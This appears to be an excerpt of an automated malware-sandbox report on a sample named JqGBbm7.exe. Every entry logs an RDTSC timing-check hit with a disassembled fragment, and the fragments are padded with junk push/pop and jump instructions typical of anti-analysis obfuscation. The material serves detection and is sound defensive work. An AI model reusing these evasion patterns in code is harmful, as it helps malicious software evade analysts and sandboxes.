Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11EBC second address: C11EE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC064DA37BEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jbe 00007FC064DA37B6h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FC064DA37B6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11EE4 second address: C11EEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C12337 second address: C12384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007FC064DA37C1h 0x0000000c jmp 00007FC064DA37BAh 0x00000011 jo 00007FC064DA37B6h 0x00000017 popad 0x00000018 jns 00007FC064DA37CCh 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C12384 second address: C1238E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC064DD4F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C12966 second address: C1296E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C1296E second address: C12972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BB57E0 second address: BB5811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FC064DA37BCh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FC064DA37C5h 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BB5811 second address: BB581B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8C9DC second address: B8C9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C130AB second address: C130B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C130B1 second address: C130B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C130B7 second address: C130D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jne 00007FC064DD4F7Ch 0x0000000e jo 00007FC064DD4F76h 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FC064DD4F76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C130D5 second address: C130F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DA37B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FC064DA37BFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C16D0E second address: C16D20 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC064DD4F7Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C16D20 second address: C16D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C16D29 second address: C16D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C16D2D second address: C16D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C16D33 second address: C16D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC064DD4F7Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD759E second address: BD75A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD75A3 second address: BD75BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F7Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD76BE second address: BD76D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD76D4 second address: BD76DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD78C5 second address: BD78CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7ABA second address: BD7ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7ABE second address: BD7ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC064DA37B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7BFC second address: BD7C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7C96 second address: BD7C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7C9A second address: BD7CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FC064DD4F78h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov di, dx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC064DD4F7Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7CD3 second address: BD7CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DA37C7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD7CF9 second address: BD7D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC064DD4F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD800B second address: BD8037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC064DA37B6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC064DA37C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FC064DA37B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD86A2 second address: BD86B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD86B9 second address: BD86BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD86BF second address: BD86CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C173E8 second address: C17411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BBh 0x00000007 jmp 00007FC064DA37C6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C17411 second address: C17415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C17550 second address: C17558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C17558 second address: C1755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C176B4 second address: C176B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C176B8 second address: C176DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC064DD4F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FC064DD4F81h 0x00000012 jno 00007FC064DD4F76h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C17817 second address: C1783A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC064DA37C2h 0x0000000c jng 00007FC064DA37B8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B89389 second address: B8939E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC064DD4F76h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8939E second address: B893A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC064DA37B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C1F7C6 second address: C1F7DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC064DD4F7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C1F7DA second address: C1F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C23BFB second address: C23C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC064DD4F76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C23C05 second address: C23C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C297CE second address: C297E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FC064DD4F76h 0x00000013 jg 00007FC064DD4F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C297E9 second address: C297F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C297F1 second address: C297F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C297F7 second address: C297FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C297FD second address: C29823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F87h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC064DD4F76h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C2995F second address: C29972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C29972 second address: C29976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C29976 second address: C2997A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C29D77 second address: C29D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jno 00007FC064DD4F76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C29D87 second address: C29D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C29D8D second address: C29D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD81A5 second address: BD8207 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC064DA37BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D30B5h], esi 0x00000013 mov ebx, dword ptr [ebp+124842EBh] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FC064DA37B8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 add eax, ebx 0x00000035 movzx edx, bx 0x00000038 nop 0x00000039 jmp 00007FC064DA37C9h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD8207 second address: BD8216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD8216 second address: BD8253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000004h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC064DA37B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007FC064DA37BEh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C2A04A second address: C2A04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C2ECFD second address: C2ED01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C2E0E3 second address: C2E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C2E4E6 second address: C2E4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31EC0 second address: C31ECF instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DD4F7Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C315B0 second address: C315CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B51 second address: C31B5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B5B second address: C31B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B61 second address: C31B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B65 second address: C31B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B6F second address: C31B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C31B73 second address: C31B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C341FE second address: C3420D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DD4F78h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3A61D second address: C3A623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3A623 second address: C3A627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3A8F1 second address: C3A948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007FC064DA37BAh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC064DA37BFh 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC064DA37C1h 0x0000001c jmp 00007FC064DA37C3h 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC064DA37BAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3B1A5 second address: C3B1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3B1AB second address: C3B1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3B1B3 second address: C3B1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3B1BF second address: C3B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3B7AB second address: C3B7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3C33D second address: C3C343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3F7A9 second address: C3F7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FACF second address: C3FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FC55 second address: C3FC6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC064DD4F7Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FC6B second address: C3FC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FC76 second address: C3FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FC7A second address: C3FC80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C3FE06 second address: C3FE20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
